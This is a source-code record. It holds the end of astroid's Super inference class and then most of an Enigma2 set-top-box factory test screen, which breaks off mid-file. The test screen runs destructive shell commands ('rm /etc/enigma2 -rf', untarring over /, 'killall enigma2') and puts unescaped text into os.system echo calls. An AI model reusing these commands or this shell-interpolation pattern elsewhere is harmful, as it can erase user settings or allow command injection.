"The second argument to super must be an "
"instance or subtype of type, not {type}.",
super_=self)
index = mro.index(self.mro_pointer)
return mro[index + 1:]
@decorators.cachedproperty
def _proxied(self):
builtins = MANAGER.astroid_cache[BUILTINS]
return builtins.getattr('super')[0]
def pytype(self):
return '%s.super' % BUILTINS
def display_type(self):
return 'Super of'
@property
def name(self):
"""Get the name of the MRO pointer."""
return self.mro_pointer.name
def igetattr(self, name, context=None):
"""Retrieve the inferred values of the given attribute name."""
local_name = self._model.get(name)
if local_name:
yield local_name
return
try:
mro = self.super_mro()
# Don't let invalid MROs or invalid super calls
# leak out as is from this function.
except exceptions.SuperError as exc:
util.reraise(exceptions.AttributeInferenceError(
('Lookup for {name} on {target!r} because super call {super!r} '
'is invalid.'),
target=self, attribute=name, context=context, super_=exc.super_))
except exceptions.MroError as exc:
util.reraise(exceptions.AttributeInferenceError(
('Lookup for {name} on {target!r} failed because {cls!r} has an '
'invalid MRO.'),
target=self, attribute=name, context=context, mros=exc.mros,
cls=exc.cls))
found = False
for cls in mro:
if name not in cls.locals:
continue
found = True
for inferred in bases._infer_stmts([cls[name]], context, frame=self):
if not isinstance(inferred, scoped_nodes.FunctionDef):
yield inferred
continue
# We can obtain different descriptors from a super depending
# on what we are accessing and where the super call is.
if inferred.type == 'classmethod':
yield bases.BoundMethod(inferred, cls)
elif self._scope.type == 'classmethod' and inferred.type == 'method':
yield inferred
elif self._class_based or inferred.type == 'staticmethod':
yield inferred
else:
yield bases.BoundMethod(inferred, cls)
if not found:
raise exceptions.AttributeInferenceError(target=self,
attribute=name,
context=context)
def getattr(self, name, context=None):
return list(self.igetattr(name, context=context))
|
pylint-bot/astroid-unofficial
|
astroid/objects.py
|
Python
|
gpl-2.0
| 6,789
|
from Screen import Screen
from Components.ChoiceList import ChoiceEntryComponent, ChoiceList
from Components.Sources.StaticText import StaticText
from Components.ActionMap import ActionMap, NumberActionMap
from Components.Label import MultiColorLabel, Label
from Components.config import ConfigIP, NoSave, configfile, config, Config, ConfigSubsection
from Components.Network import iNetwork
from Components.Console import Console
from Components.Harddisk import harddiskmanager
from Components.About import about
from Components.FanControl import fancontrol
from Components.Sensors import sensors
from Components.Sources.Sensor import SensorSource
from Components.NimManager import nimmanager, InitNimManager
from Tools.HardwareInfo import HardwareInfo
from Screens.MessageBox import MessageBox
from Screens.Standby import QuitMainloopScreen
from Plugins.SystemPlugins.Videomode.VideoHardware import video_hw
from enigma import eTimer, eServiceReference, eDVBDB, quitMainloop
from enigma import eDVBResourceManager, iDVBFrontend
from enigma import eDVBCI_UI, eDVBCIInterfaces
from enigma import eDVBVolumecontrol
import os, fcntl, array, socket, struct
class TestMenu(Screen):
# 1.0.0 -
# 1.0.1 - alpumr check removed
# 1.0.2 - optimussos1, optimussos2 model added.
# 1.0.3 - de language update.
TEST_PROG_VERSION = "1.0.3"
skin = """
<screen name="TestMenu" position="fill" title="Test Menu" flags="wfNoBorder">
<eLabel position="fill" backgroundColor="transpBlack" zPosition="-50"/>
<widget name="label0" position="80,55" size="540,29" foregroundColor="#0006c8f3" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="menulist" position="80,90" size="540,240" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" backgroundColorSelected="white" foregroundColorSelected="black" />
<widget name="lan_i" position="80,350" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="sc0_i" position="80,380" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="sc1_i" position="80,410" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="ci0_i" position="80,440" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="ci1_i" position="80,470" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="sata_i" position="80,500" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="usb0_i" position="80,530" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="usb1_i" position="80,560" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="usb2_i" position="80,590" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="lan_s" position="280,350" size="340,29" foregroundColors="#00ff4500,#007fff00" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="sc0_s" position="280,380" size="340,29" foregroundColors="#00ff4500,#007fff00" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="sc1_s" position="280,410" size="340,29" foregroundColors="#00ff4500,#007fff00" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="ci0_s" position="280,440" size="340,29" foregroundColors="#00ff4500,#007fff00" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="ci1_s" position="280,470" size="340,29" foregroundColors="#00ff4500,#007fff00" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="sata_s" position="280,500" size="340,29" foregroundColors="#00ff4500,#007fff00" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="usb0_s" position="280,530" size="340,29" foregroundColors="#00ff4500,#007fff00" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="usb1_s" position="280,560" size="340,29" foregroundColors="#00ff4500,#007fff00" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="usb2_s" position="280,590" size="340,29" foregroundColors="#00ff4500,#007fff00" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="label1" position="640,055" size="540,29" foregroundColor="#0006c8f3" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="mac_i" position="640,090" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="info0_i" position="640,120" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="info1_i" position="640,150" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="micom_i" position="640,180" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="security0_i" position="640,210" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="security1_i" position="640,240" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="mac_s" position="840,090" size="340,29" foregroundColors="white,#00ff4500" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="info0_s" position="840,120" size="340,29" foregroundColors="white,#00ff4500" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="info1_s" position="840,150" size="340,29" foregroundColors="white,#00ff4500" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="micom_s" position="840,180" size="340,29" foregroundColors="white,#00ff4500" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="security0_s" position="840,210" size="340,29" foregroundColors="white,#00ff4500" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="security1_s" position="840,240" size="340,29" foregroundColors="white,#00ff4500" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="button_left" position="840,430" size="84,19" foregroundColors="#00ff4500,#0070ff00" backgroundColor="#40000000" font="Regular;18" zPosition="1" halign="center" />
<widget name="button_right" position="925,430" size="84,19" foregroundColors="#00ff4500,#0070ff00" backgroundColor="#40000000" font="Regular;18" zPosition="1" halign="center" />
<widget name="button_down" position="1010,430" size="84,19" foregroundColors="#00ff4500,#0070ff00" backgroundColor="#40000000" font="Regular;18" zPosition="1" halign="center" />
<widget name="button_up" position="1095,430" size="84,19" foregroundColors="#00ff4500,#0070ff00" backgroundColor="#40000000" font="Regular;18" zPosition="1" halign="center" />
<widget name="button_power" position="840,450" size="84,19" foregroundColors="#00ff4500,#0070ff00" backgroundColor="#40000000" font="Regular;18" zPosition="1" halign="center" />
<widget name="button_menu" position="925,450" size="84,19" foregroundColors="#00ff4500,#0070ff00" backgroundColor="#40000000" font="Regular;18" zPosition="1" halign="center" />
<widget name="button_ok" position="1010,450" size="84,19" foregroundColors="#00ff4500,#0070ff00" backgroundColor="#40000000" font="Regular;18" zPosition="1" halign="center" />
<widget name="button_exit" position="1095,450" size="84,19" foregroundColors="#00ff4500,#0070ff00" backgroundColor="#40000000" font="Regular;18" zPosition="1" halign="center" />
<widget name="button_info" position="840,480" size="84,19" foregroundColors="#00ff4500,#0070ff00" backgroundColor="#40000000" font="Regular;18" zPosition="1" halign="center" />
<eLabel name="snr" position="840,350" size="340,19" halign="left" transparent="1" text="SNR" font="Regular;18" />
<widget source="session.FrontendStatus" render="Progress" pixmap="PLi-HD/infobar/pbar_grey.png" backgroundColor="#40000000" position="840,350" size="340,19" >
<convert type="FrontendInfo">SNR</convert>
</widget>
<widget source="session.FrontendStatus" render="Label" position="840,350" size="340,19" backgroundColor="#40000000" transparent="1" halign="right" font="Regular;18" >
<convert type="FrontendInfo">SNR</convert>
</widget>
<eLabel name="agc" position="840,370" size="84,19" backgroundColor="#40000000" halign="left" text="AGC" font="Regular;18" />
<widget source="session.FrontendStatus" render="Label" position="925,370" size="84,19" backgroundColor="#40000000" font="Regular;18">
<convert type="FrontendInfo">AGC</convert>
</widget>
<eLabel name="ber" position="1011,370" size="84,19" backgroundColor="#40000000" halign="left" text="BER" font="Regular;18" />
<widget source="session.FrontendStatus" render="Label" position="1096,370" size="84,19" backgroundColor="#40000000" font="Regular;18">
<convert type="FrontendInfo">BER</convert>
</widget>
<widget source="SensorFanText0" render="Label" position="840,400" size="84,19" font="Regular;18" backgroundColor="#40000000" />
<widget source="SensorFan0" render="Label" position="925,400" size="84,19" font="Regular;18" backgroundColor="#40000000" >
<convert type="SensorToText"></convert>
</widget>
<widget source="SensorTempText0" render="Label" position="1011,400" size="84,19" font="Regular;18" backgroundColor="#40000000" />
<widget source="SensorTemp0" render="Label" position="1096,400" size="84,19" font="Regular;18" backgroundColor="#40000000" >
<convert type="SensorToText"></convert>
</widget>
</screen>"""
CARD_LIST = {
chr(0x3b) + chr(0x9f) + chr(0x21) + chr(0x0e) + chr(0x49) + chr(0x52) + chr(0x44) : "Irdeto",
chr(0x3b) + chr(0xf7) + chr(0x11) + chr(0x00) : "Seca",
chr(0x3b) + chr(0x78) + chr(0x12) : "Cryptoworks",
chr(0x3b) + chr(0x26) + chr(0x00) : "Conax",
chr(0x3b) + chr(0x24) + chr(0x00) : "Conax",
chr(0x3b) + chr(0x34) + chr(0xd6) : "Drecrypt",
chr(0x3f) + chr(0xff) + chr(0x95) : "Nagravision",
chr(0x3f) + chr(0x7f) + chr(0x13) : "NDS",
chr(0x3f) + chr(0xfd) + chr(0x13) : "NDS",
chr(0x3f) + chr(0x27) + chr(0x17) : "Viaccess",
chr(0x3f) + chr(0x77) + chr(0x18) : "Viaccess",
chr(0x3b) + chr(0x77) + chr(0x18) : "Viaccess",
chr(0x3b) + chr(0x9c) + chr(0x13) + chr(0x11) + chr(0x81) + chr(0x64) + chr(0x72) : "Firecrypt",
chr(0x3b) + chr(0xec) + chr(0x00) + chr(0x00) + chr(0x40) + chr(0x38) + chr(0x57) : "Type1",
chr(0x3b) + chr(0xff) + chr(0xe0) + chr(0x1c) + chr(0x57) + chr(0xe0) + chr(0x74) : "Type2",
chr(0x3f) + chr(0xfd) + chr(0x95) + chr(0x00) + chr(0xff) + chr(0x91) + chr(0x81) : "Type3"}
# 0 - front, 1 - upper rear, 2 - lower rear
USBDB = {
"tmtwinoe":
{
"/devices/platform/ehci-brcm.1/usb2/2-1/2-1:1.0": 0,
"/devices/platform/ehci-brcm.0/usb1/1-1/1-1:1.0": 1,
"/devices/platform/ehci-brcm.0/usb1/1-2/1-2:1.0": 2,
},
"tm2toe":
{
"/devices/platform/ehci-brcm.1/usb2/2-1/2-1:1.0": 0,
"/devices/platform/ehci-brcm.0/usb1/1-1/1-1:1.0": 1,
"/devices/platform/ehci-brcm.0/usb1/1-2/1-2:1.0": 2,
},
"tmsingle":
{
"/devices/platform/ehci-brcm.1/usb2/2-1/2-1:1.0": 0,
"/devices/platform/ehci-brcm.0/usb1/1-1/1-1:1.0": 1,
"/devices/platform/ehci-brcm.0/usb1/1-2/1-2:1.0": 2,
},
"tmnanooe":
{
"/devices/platform/ehci-brcm.1/usb2/2-1/2-1:1.0": 0,
"/devices/platform/ehci-brcm.0/usb1/1-1/1-1:1.0": 1,
"/devices/platform/ehci-brcm.0/usb1/1-2/1-2:1.0": 2,
},
"ios100hd":
{
"/devices/platform/ehci-brcm.1/usb2/2-1/2-1:1.0": 0,
"/devices/platform/ehci-brcm.0/usb1/1-1/1-1:1.0": 1,
"/devices/platform/ehci-brcm.0/usb1/1-2/1-2:1.0": 2,
},
"ios200hd":
{
"/devices/platform/ehci-brcm.1/usb2/2-1/2-1:1.0": 0,
"/devices/platform/ehci-brcm.0/usb1/1-1/1-1:1.0": 1,
"/devices/platform/ehci-brcm.0/usb1/1-2/1-2:1.0": 2,
},
"ios300hd":
{
"/devices/platform/ehci-brcm.1/usb2/2-1/2-1:1.0": 0,
"/devices/platform/ehci-brcm.0/usb1/1-1/1-1:1.0": 1,
"/devices/platform/ehci-brcm.0/usb1/1-2/1-2:1.0": 2,
},
"mediabox":
{
"/devices/platform/ehci-brcm.1/usb2/2-1/2-1:1.0": 0,
"/devices/platform/ehci-brcm.0/usb1/1-1/1-1:1.0": 1,
"/devices/platform/ehci-brcm.0/usb1/1-2/1-2:1.0": 2,
},
"optimussos1":
{
"/devices/platform/ehci-brcm.1/usb2/2-1/2-1:1.0": 0,
"/devices/platform/ehci-brcm.0/usb1/1-1/1-1:1.0": 1,
"/devices/platform/ehci-brcm.0/usb1/1-2/1-2:1.0": 2,
},
"optimussos2":
{
"/devices/platform/ehci-brcm.1/usb2/2-1/2-1:1.0": 0,
"/devices/platform/ehci-brcm.0/usb1/1-1/1-1:1.0": 1,
"/devices/platform/ehci-brcm.0/usb1/1-2/1-2:1.0": 2,
},
"tmnano2t":
{
"/devices/platform/ehci-brcm.1/usb2/2-1/2-1:1.0": 0,
"/devices/platform/ehci-brcm.0/usb1/1-1/1-1:1.0": 1,
"/devices/platform/ehci-brcm.0/usb1/1-2/1-2:1.0": 2,
}
}
def __init__(self, session):
Screen.__init__(self, session)
self.session = session
if HardwareInfo().get_device_name() == "mediabox":
os.system("opkg remove enigma2-plugin-channel.non.motorized-techsat-17-29-57")
os.system("rm /etc/enigma2 -rf; touch /etc/.run_factory_test; tar xf /etc/.e2settings.tar -C /")
configfile.load()
nimmanager.readTransponders()
InitNimManager(nimmanager)
eDVBDB.getInstance().reloadBouquets()
eDVBDB.getInstance().reloadServicelist()
self.iface = "eth0"
self["actions"] = NumberActionMap(["WizardActions", "InputActions", "ColorActions", "DirectionActions", "InfobarChannelSelection", "StandbyActions", "GlobalActions", "TimerEditActions"],
{
"ok": self.go,
"back": self.cancel,
"up": self.up,
"down": self.down,
"1": self.keyNumberGlobal,
"2": self.keyNumberGlobal,
"3": self.keyNumberGlobal,
"4": self.keyNumberGlobal,
"5": self.keyNumberGlobal,
"6": self.keyNumberGlobal,
"7": self.keyNumberGlobal,
"8": self.keyNumberGlobal,
"9": self.keyNumberGlobal,
"0": self.keyNumberGlobal,
"red": self.keyRed,
"green": self.keyGreen,
"yellow": self.keyYellow,
"blue": self.keyBlue,
"left": self.frontButtonLeft,
"right": self.frontButtonRight,
"exit": self.frontButtonExit,
"menu": self.frontButtonMenu,
"power": self.frontButtonPower,
"ChannelPlusPressed": self.frontButtonChPlus,
"ChannelMinusPressed": self.frontButtonChMinus,
"volumeUp": self.frontButtonVolUp,
"volumeDown": self.frontButtonVolDown,
"log": self.frontButtonInfo,
}, -1)
model = HardwareInfo().get_device_name()
self.has_fan = model not in ("ios300hd", "mediabox" )
self.has_nav_keys = model not in ("tmtwinoe", "ios100hd", "mediabox", "ios200hd", "optimussos2")
self.has_8_buttons = model in ("tmtwinoe", "ios100hd")
self.has_9_buttons = model in ("tm2toe", "tmsingle")
self.has_7_buttons = model in ("tmnanooe", "ios300hd", "optimussos1" )
self.has_5_buttons = model in ("mediabox","ios200hd", "optimussos2", "tmnano2t" )
self.has_fan_sensor = model in ("tmtwinoe", "tm2toe", "ios100hd" )
self.has_sata = model not in ("ios300hd", "mediabox")
# self.has_1_rear_usb = "tmnano" in model
self.has_sc41cr = model in ("ios200hd", "tmnanooe","optimussos1","optimussos2", "tmnano2t" )
self.has_1_tuner = model in ("tmnanooe", "ios300hd", "mediabox", "tmsingle", "optimussos1")
self.has_vfd = model not in ("tmsingle", "tmnanooe", "ios200hd", "ios300hd", "mediabox", "optimussos1", "tmnano2t" )
self.MENU_LIST = []
self.MENU_LIST.append([ "[T1] H18, 720P, CVBS, 4:3, 22OFF (TRACE URB)", "ch1", self.func ])
self.MENU_LIST.append([ "[T1] V14, 576i, YC, 4:3, 22OFF (MASTV)", "ch2", self.func ])
if len(nimmanager.nimList()) == 2:
self.MENU_LIST.append([ "[T2] H18, 576i, RGB, 16:9, 22OFF (France 24)", "ch3", self.func ])
self.MENU_LIST.append([ "[T2] V14, 1080i, CVBS, 16:9, 22OFF (NewSky)", "ch4", self.func ])
else:
self.MENU_LIST.append([ "[T1] H18, 576i, RGB, 16:9, 22OFF (France 24)", "ch3", self.func ])
self.MENU_LIST.append([ "[T1] V14, 1080i, CVBS, 16:9, 22OFF (NewSky)", "ch4", self.func ])
self.MENU_LIST.append([ "22Khz - ON /[OFF]", "tone", self.func ])
if self.has_fan:
self.MENU_LIST.append([ "FAN - [ON]/ OFF", "fan", self.func ])
self.MENU_LIST.append([ "FRONT PANEL", "fp", self.func ])
self.MENU_LIST.append([ "DEEP STANDBY", "ds", self.func ])
self.BUTTON_TEST = {
"ok": { "button":"button_ok", "func":self.frontButtonOk, "pressed":False, "text":"OK" },
"up": { "button":"button_up", "func":self.frontButtonUp, "pressed":False, "text":"^" },
"down": { "button":"button_down", "func":self.frontButtonDown, "pressed":False, "text":"V" },
"left": { "button":"button_left", "func":self.frontButtonLeft, "pressed":False, "text":"<" },
"right": { "button":"button_right", "func":self.frontButtonRight, "pressed":False, "text":">" },
"exit": { "button":"button_exit", "func":self.frontButtonExit, "pressed":False, "text":"EXIT" },
"menu": { "button":"button_menu", "func":self.frontButtonMenu, "pressed":False, "text":"MENU" },
"power": { "button":"button_power", "func":self.frontButtonPower, "pressed":False, "text":"POWER" }}
if not self.has_nav_keys:
self.BUTTON_TEST["up"]["text"] = "VOL+"
self.BUTTON_TEST["up"]["func"] = self.frontButtonVolUp
self.BUTTON_TEST["down"]["text"] = "VOL-"
self.BUTTON_TEST["down"]["func"] = self.frontButtonVolDown
self.BUTTON_TEST["left"]["text"] = "CH-"
self.BUTTON_TEST["left"]["func"] = self.frontButtonChMinus
self.BUTTON_TEST["right"]["text"] = "CH+"
self.BUTTON_TEST["right"]["func"] = self.frontButtonChPlus
if self.has_9_buttons:
self.BUTTON_TEST["info"] = { "button":"button_info", "func":self.frontButtonInfo, "pressed":False, "text":"INFO" }
if self.has_7_buttons:
self.BUTTON_TEST.pop("exit")
if self.has_5_buttons:
self.BUTTON_TEST.pop("exit")
self.BUTTON_TEST.pop("menu")
self.BUTTON_TEST.pop("ok")
self.fpTestMode = False
self.service = "ch1"
self.setMenuList(self.MENU_LIST)
self.setTestItemsLabel()
# models using fan ic, available rpm, temp
if self.has_fan_sensor:
self.initFanSensors()
self.networkMonitor = eTimer()
self.networkMonitor.callback.append(self.getLinkState)
self.networkMonitor.start(1000, True)
self.smartcardInserted = [ False, False ]
self.smartcardMonitor = eTimer()
self.smartcardMonitor.callback.append(self.getSCState)
self.smartcardMonitor.start(1000, False)
self.ciMonitor = eTimer()
self.ciMonitor.callback.append(self.getCIState)
self.ciMonitor.start(1000, False)
self.storageMonitor = eTimer()
self.storageMonitor.callback.append(self.getStorageState)
self.storageMonitor.start(1000, False)
self.onLayoutFinish.append(self.layoutFinished)
def cancel(self):
if self.fpTestMode:
self.frontButtonExit()
# else:
# self.session.openWithCallback(self.quitConfirmed, MessageBox, _("Do you really want to quit?"), default = False)
def quitConfirmed(self, answer):
if answer:
self.quit(3)
def quit(self, mode):
self.networkMonitor.stop()
self.smartcardMonitor.stop()
self.ciMonitor.stop()
self.storageMonitor.stop()
self.hide()
if mode == 1:
os.system("rm /etc/enigma2 -rf")
self.hide()
self.quitScreen = self.session.instantiateDialog(QuitMainloopScreen,retvalue=mode)
self.quitScreen.show()
quitMainloop(mode)
elif mode == 3:
os.system("rm /etc/.run_factory_test -f; rm /etc/enigma2 -rf")
if HardwareInfo().get_device_name() == "mediabox":
os.system("tar xvf /etc/var.tar -C /; opkg install /tmp/enigma2-plugin-channel.non.motorized-techsat-17-29-57_20130610_all.ipk")
os.system("killall enigma2")
def up(self):
if self.fpTestMode:
self.frontButtonUp()
else:
if len(self["menulist"].list) > 0:
while 1:
self["menulist"].instance.moveSelection(self["menulist"].instance.moveUp)
if self["menulist"].l.getCurrentSelection()[0][0] != "--" or self["menulist"].l.getCurrentSelectionIndex() == 0:
break
os.system("echo \"%s\" > /proc/stb/lcd/show_txt" % self["menulist"].l.getCurrentSelection()[0][0])
self.vfdTextWrite(self["menulist"].l.getCurrentSelection()[0][0])
def down(self):
if self.fpTestMode:
self.frontButtonDown()
else:
if len(self["menulist"].list) > 0:
while 1:
self["menulist"].instance.moveSelection(self["menulist"].instance.moveDown)
if self["menulist"].l.getCurrentSelection()[0][0] != "--" or self["menulist"].l.getCurrentSelectionIndex() == len(self["menulist"].list) - 1:
break
os.system("echo \"%s\" > /proc/stb/lcd/show_txt" % self["menulist"].l.getCurrentSelection()[0][0])
self.vfdTextWrite(self["menulist"].l.getCurrentSelection()[0][0])
# runs a number shortcut
def keyNumberGlobal(self, number):
if self.fpTestMode:
return
else:
self.goKey(str(number))
# runs the current selected entry
def go(self):
if self.fpTestMode:
self.frontButtonOk()
else:
cursel = self["menulist"].l.getCurrentSelection()
if cursel:
self.goEntry(cursel[0])
else:
self.cancel()
# runs a specific entry
def goEntry(self, entry):
# do self.func
os.system("echo \"%s\" > /proc/stb/lcd/show_txt" % entry[0])
self.vfdTextWrite(entry[0])
entry[2](entry)
# lookups a key in the keymap, then runs it
def goKey(self, key):
if self.keymap.has_key(key):
self["menulist"].instance.moveSelectionTo(self.__keys.index(key))
entry = self.keymap[key]
self.goEntry(entry)
# runs a color shortcut
def keyRed(self):
if self.fpTestMode:
self.fpTestQuit()
else:
self.goKey("red")
def keyGreen(self):
self.goKey("green")
def keyYellow(self):
self.goKey("yellow")
def keyBlue(self):
self.goKey("blue")
# ---------------------------------------------------------------------
# ui
# ---------------------------------------------------------------------
def setMenuList(self, list):
self.list = []
# 0 for exit
# self.__keys = [ "1", "2", "3", "4", "5", "6", "7", "8", "9", "0", "red", "green", "yellow", "blue" ] + (len(list) - 10) * [""]
self.__keys = [ "1", "2", "3", "4", "5", "6", "7", "8", "9", "red", "green", "yellow", "blue" ] + (len(list) - 10) * [""]
pos = 0
self.keymap = {}
for x in list:
strpos = str(self.__keys[pos])
self.list.append(ChoiceEntryComponent(key = strpos, text = x))
if self.__keys[pos] != "":
self.keymap[self.__keys[pos]] = list[pos]
pos += 1
# 0 for exit, add to end of menu list
self.keymap["0"] = [ "EXIT", "exit", self.func ]
self.list.append(ChoiceEntryComponent(key = "0", text = self.keymap["0"]))
self.__keys[pos] = "0"
if not self.has_key("menulist"):
self["menulist"] = ChoiceList(self.list)
else:
self["menulist"].hide()
self["menulist"].setList(self.list)
self["menulist"].show()
def setTestItemsLabel(self):
self["label0"] = Label(_(" TEST MENU"))
self["label1"] = Label(_(" SYSTEM INFORMATION"))
self["lan_i"] = Label(_(" IP"))
self["lan_s"] = MultiColorLabel(_(" N/A"))
self["sata_i"] = Label(_(" iSATA"))
self["sata_s"] = MultiColorLabel(_(" N/A"))
# not support internal sata
if not self.has_sata:
self["sata_i"].hide()
self["sata_s"].hide()
self["info0_i"] = Label(_(" Hardware"))
self["info0_s"] = MultiColorLabel(_(" N/A"))
self["info1_i"] = Label(_(" Version"))
self["info1_s"] = MultiColorLabel(_(" N/A"))
self["mac_i"] = Label(_(" Mac Address"))
self["mac_s"] = MultiColorLabel(_(" N/A"))
self["micom_i"] = Label(_(" Micom Version"))
self["micom_s"] = MultiColorLabel(_(" N/A"))
for i in (0, 1):
self["sc%d_i" % i] = Label(_(" SC Slot-%d" % (i+1)))
self["sc%d_s" % i] = MultiColorLabel(_(" N/A"))
self["ci%d_i" % i] = Label(_(" CI Slot-%d" % (i+1)))
self["ci%d_s" % i] = MultiColorLabel(_(" N/A"))
self["security%d_i" % i] = Label(_(" Security%d" % i))
self["security%d_s" % i] = MultiColorLabel(_(" N/A"))
self["usb0_i"] = Label(_(" Front USB"))
self["usb0_s"] = MultiColorLabel(_(" N/A"))
self["usb1_i"] = Label(_(" Rear USB-1"))
self["usb1_s"] = MultiColorLabel(_(" N/A"))
self["usb2_i"] = Label(_(" Rear USB-2"))
self["usb2_s"] = MultiColorLabel(_(" N/A"))
## will change rear 2 usb model for tmnanooe, optimussos1
# if self.has_1_rear_usb:
# self["usb1_i"].setText(_(" Rear USB"))
# self["usb2_i"].hide()
# self["usb2_s"].hide()
for button in self.BUTTON_TEST:
self[self.BUTTON_TEST[button]["button"]] = MultiColorLabel(_(self.BUTTON_TEST[button]["text"]))
self[self.BUTTON_TEST[button]["button"]].hide()
def layoutFinished(self):
model = HardwareInfo().get_device_name()
if model == "optimussos1":
self["info0_s"].setText(_("OPTIMUSS OS1"))
elif model == "optimussos2":
self["info0_s"].setText(_("OPTIMUSS OS2"))
else:
self["info0_s"].setText(_(" %s" % (about.getHardwareTypeString())))
self["info1_s"].setText(_(" %s" % (self.TEST_PROG_VERSION)))
self["mac_s"].setText(_(" %s" % self.getMacaddress()))
self["micom_s"].setText(_(" %s" % self.getMicomVersion()))
securityRes = self.checkSecurityChip()
if securityRes == 0xf:
for i in (0, 1):
self["security%d_i" % i].hide()
self["security%d_s" % i].hide()
elif self.has_sc41cr:
if securityRes:
self["security0_s"].setText(_(" SC41CR - NOK"))
self["security0_s"].setForegroundColorNum(1)
else:
self["security0_s"].setText(_(" SC41CR - OK"))
self["security1_i"].hide()
self["security1_s"].hide()
else:
if securityRes>>1 & 1:
self["security0_s"].setText(_(" CO164 - NOK"))
self["security0_s"].setForegroundColorNum(1)
else:
self["security0_s"].setText(_(" CO164 - OK"))
self["security1_i"].hide()
self["security1_s"].hide()
self.keyNumberGlobal(1)
from enigma import eDVBVolumecontrol
eDVBVolumecontrol.getInstance().setVolume(100, 100)
# ---------------------------------------------------------------------
# menulist functions
# ---------------------------------------------------------------------
def func(self, entry):
self["menulist"].hide()
if "ch1" in entry[1]:
video_hw.setMode("Scart", "720p", "50Hz")
config.av.colorformat.value = "cvbs"
open("/proc/stb/video/aspect", "w").write("4:3")
self.setTone("off")
self.playService(entry[1])
elif "ch2" in entry[1]:
video_hw.setMode("YPbPr", "576i", "50Hz")
config.av.colorformat.value = "yuv"
open("/proc/stb/video/aspect", "w").write("4:3")
self.setTone("off")
self.playService(entry[1])
elif "ch3" in entry[1]:
video_hw.setMode("Scart", "576i", "50Hz")
config.av.colorformat.value = "rgb"
open("/proc/stb/video/aspect", "w").write("16:9")
self.setTone("off")
self.playService(entry[1])
elif "ch4" in entry[1]:
video_hw.setMode("Scart", "1080i", "50Hz")
config.av.colorformat.value = "cvbs"
open("/proc/stb/video/aspect", "w").write("16:9")
self.setTone("off")
self.playService(entry[1])
elif entry[1] == "tone":
if "[ON]" in entry[0]:
self.setTone("off")
else:
self.setTone("on")
# TODO - romove below channel change codes,
# without channel change, tuner configuration does not change
if self.service == "ch1":
self.playService("ch2")
self.playService("ch1")
elif self.service == "ch2":
self.playService("ch1")
self.playService("ch2")
elif self.service == "ch3":
self.playService("ch4")
self.playService("ch3")
elif self.service == "ch4":
self.playService("ch3")
self.playService("ch4")
elif entry[1] == "fan":
if "[ON]" in entry[0]:
self.setFan("off")
else:
self.setFan("on")
elif entry[1] == "fp":
self.fpTest()
elif entry[1] == "ds":
self.deepStandby()
elif entry[1] == "exit":
self.session.openWithCallback(self.quitConfirmed, MessageBox, _("Do you really want to quit?"), default = True)
else:
print "what", entry
self["menulist"].show()
# show vfd message
index = 0
for menu in self.MENU_LIST:
if menu[1] == entry[1]:
os.system("echo \"%s\" > /proc/stb/lcd/show_txt" % self.MENU_LIST[index][0])
self.vfdTextWrite(self.MENU_LIST[index][0])
break
index += 1
def changeMenuName(self, menuid, menutext):
index = 0
for menu in self.MENU_LIST:
if menu[1] == menuid:
self.MENU_LIST[index][0] = menutext
break
index += 1
self.setMenuList(self.MENU_LIST)
# ---------------------------------------------------------------------
# channel
# ---------------------------------------------------------------------
def playService(self, service=None):
if service:
self.service = service
self.session.nav.stopService()
if self.service == "ch1":
self.session.nav.playService(eServiceReference("1:0:1:F:1:9D:C00000:0:0:0:"))
elif self.service == "ch2":
self.session.nav.playService(eServiceReference("1:0:1:6:1:1:C00000:0:0:0:"))
elif self.service == "ch3":
if len(nimmanager.nimList()) == 2:
self.session.nav.playService(eServiceReference("1:0:1:8:1:FFFF:C80FA0:0:0:0:"))
else:
self.session.nav.playService(eServiceReference("1:0:1:8:1:FFFF:C00FA0:0:0:0:"))
elif self.service == "ch4":
if len(nimmanager.nimList()) == 2:
self.session.nav.playService(eServiceReference("1:0:1:2:1:1:C89034:0:0:0:"))
else:
self.session.nav.playService(eServiceReference("1:0:1:2:1:1:C00000:0:0:0:"))
def setTone(self, tone):
